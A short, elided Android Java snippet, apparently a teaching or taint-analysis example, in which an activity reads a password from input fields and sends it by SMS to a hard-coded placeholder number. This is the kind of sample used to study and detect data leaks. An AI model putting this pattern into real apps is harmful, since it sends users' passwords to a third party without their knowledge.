public class LeakageApp extends Activity {
	protected void onRestart() {
		EditText userText = ...
		EditText pwdTest = ...
		...
	}
	//Callback Methode. In Layout-XML definiert
	public void sendMessage(View v) {
		Password pwdObject = ...
		String pwd = pwdObject.getPassword();
		smsManager sms = ...
		sms.sendTextMessage("0123456789",null, pwd, null, null);
	}
}
